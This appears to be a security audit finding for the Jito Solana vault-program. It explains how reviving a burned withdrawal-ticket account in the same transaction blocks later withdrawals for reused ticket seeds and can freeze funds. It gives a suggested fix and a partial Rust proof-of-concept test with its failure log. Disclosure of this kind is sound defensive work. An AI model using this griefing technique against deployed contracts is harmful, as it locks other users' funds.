When a withdrawal ticket gets closed, its data gets zeroed out but not resized to zero. When someone refunds the ticket account in the same transaction to prevent the account to be garbage collected, then trying to enqueue a new withdrawal for the same account will fail, because the acount is asserted to be empty. This will cause funds to be locked for third party programs building on top of the Jito vault-program.
Vulnerability Details
The process_burn_withdrawal_ticket calls the close_program_account function like this:
If an account has zero lamports at the end of a tx, then the system will garbage collect it and remove all the data. If a subsequent instruction in the same tx transfers enough lamports back in, then the garbage collection will not happen. This is commonly known as a revival attack.
When a withdrawal gets enqueued in process_enqueue_withdrawal and a corresponding ticket needs to be created the load_system_account function will perform some checks on the ticket account prior to creation. Notably, it checks that the account has no data:
if !info.data_is_empty() {
msg!("Account data is not empty");
return Err(ProgramError::AccountAlreadyInitialized);
If the base seed used for the ticket creation is the same as a previously burned ticket that has been revived, the ticket account has not been garbage collected. The account will contain data (filled with zeroes) and the returned Err will cause process_enqueue_withdrawal to fail.
Impact Details
No withdrawals can be done for a base (seed of a withdrawal ticket) that has been previously used for a ticket that has been burned and revived. For cases, where there is no mint_burn_admin, this will only be an inconvenience, that is solvable on the client side by switching the base with a new keypair. But if the mint_burn_admin is a third party program that was built on top of Jito, then this will cause withdrawals to fail if base is a PDA that is reused, for which there can be various plausible scenarios:
The third-party program buffers withdrawals and then performs them in bulk reusing the same PDA to sign for base
Users can withdraw individually and for each user there will be a PDA created using only the users pubkey
The impact is ultimately frozen funds, that can not be withdrawn.
Recommendation and addressing scope
It can be argued that the underlying issue is that the function close_program_account, which is technically not listed as in scope, is at fault for setting all bytes to 0 instead of resizing the data to zero.
But just to showcase a simple fix on the in-scope code, a solution is to resize the data to zero before invoking close_program_account in process_burn_withdrawal_ticket (tested with the POC):
This function works mostly like do_burn_withdrawal_ticket (same file), except that it adds a transfer to the instruction list.
Now add the following test to integration_tests/tests/vault/burn_withdrawal_ticket.rs and run it with SBF_OUT_DIR=$(pwd)/target/sbf-solana-solana/release cargo nextest run --all-features --no-capture test_99crits_prevent:
//@note many parts copied from test_burn_withdrawal_ticket_basic_success
async fn test_99crits_prevent_reopening_grief() {
const MINT_AMOUNT: u64 = 100_000;
const WITHDRAWAL_AMOUNT: u64 = 10_000;
let deposit_fee_bps = 0;
let withdraw_fee_bps = 0;
let reward_fee_bps = 0;
let num_operators = 1;
let slasher_amounts = vec![];
let mut fixture = TestBuilder::new().await;
let ConfiguredVault {
mut vault_program_client,
restaking_program_client: _,
vault_config_admin: _,
restaking_config_admin: _,
} = fixture
let withdrawal_ticket_base = Keypair::new();
// Initial deposit + mint
let depositor = Keypair::new();
.configure_depositor(&vault_root, &depositor.pubkey(), MINT_AMOUNT)
.do_mint_to(&vault_root, &depositor, MINT_AMOUNT, MINT_AMOUNT)
let config = vault_program_client
// Delegate all funds to the operator
.do_add_delegation(&vault_root, &operator_roots[0].operator_pubkey, MINT_AMOUNT)
// ------ copy from do_enqueue_withdrawal, but with fixed base ------
let vault = vault_program_client.get_vault(&vault_root.vault_pubkey).await.unwrap();
let depositor_vrt_token_account =
get_associated_token_address(&depositor.pubkey(), &vault.vrt_mint);
let vault_staker_withdrawal_ticket = VaultStakerWithdrawalTicket::find_program_address(
let vault_staker_withdrawal_ticket_token_account =
get_associated_token_address(&vault_staker_withdrawal_ticket, &vault.vrt_mint);
vault_program_client.create_ata(&vault.vrt_mint, &vault_staker_withdrawal_ticket)
.do_cooldown_delegation(&vault_root, &operator_roots[0].operator_pubkey, WITHDRAWAL_AMOUNT)
// ------ modified do_burn_withdrawal_ticket ------
.do_99crits_burn_withdrawal_ticket_with_refund(&vault_root, &depositor, &withdrawal_ticket_base.pubkey(), &config.program_fee_wallet)
//@note this is the original call used in test_burn_withdrawal_ticket_basic_success, if you use this, re-enqueuing (below) will work
// this shows that refunding the ticket is indeed the cause of the griefing attack
// vault_program_client
// .do_burn_withdrawal_ticket(&vault_root, &depositor, &withdrawal_ticket_base.pubkey(), &config.program_fee_wallet)
// .await
// .unwrap();
let vault = vault_program_client
assert_eq!(vault.tokens_deposited(), 90000); //@note changed from original, since we dont withdraw all
assert_eq!(vault.vrt_supply(), 90000); //@note changed from original, since we dont withdraw all
// assert_eq!(vault.delegation_state, DelegationState::default()); //@note commented out, since we dont withdraw all
assert_eq!(vault.vrt_enqueued_for_cooldown_amount(), 0);
assert_eq!(vault.vrt_ready_to_claim_amount(), 0);
assert_eq!(vault.vrt_cooling_down_amount(), 0);
let depositor_token_account = fixture
assert_eq!(depositor_token_account.amount, WITHDRAWAL_AMOUNT);
// ------ try to enqueue again with the same base------
let vault = vault_program_client.get_vault(&vault_root.vault_pubkey).await.unwrap();
let depositor_vrt_token_account =
get_associated_token_address(&depositor.pubkey(), &vault.vrt_mint);
let vault_staker_withdrawal_ticket = VaultStakerWithdrawalTicket::find_program_address(
let vault_staker_withdrawal_ticket_token_account =
get_associated_token_address(&vault_staker_withdrawal_ticket, &vault.vrt_mint);
vault_program_client.create_ata(&vault.vrt_mint, &vault_staker_withdrawal_ticket)
This will log:
thread 'vault::burn_withdrawal_ticket::tests::test_99crits_prevent_reopening_grief' panicked at integration_tests/tests/vault/burn_withdrawal_ticket.rs:491:16:
called `Result::unwrap()` on an `Err` value: BanksClientError(SimulationError { err: InstructionError(0, AccountAlreadyInitialized), logs: ["Program Vau1t6sLNxnzB7ZDsef8TLbPLfyZMYXH8WTNqUdm9g8 invoke [1]", "Program log: Instruction: EnqueueWithdrawal", "Program log: Account data is not empty",
Which is caused by load_system_account snippet mentioned in the issue description.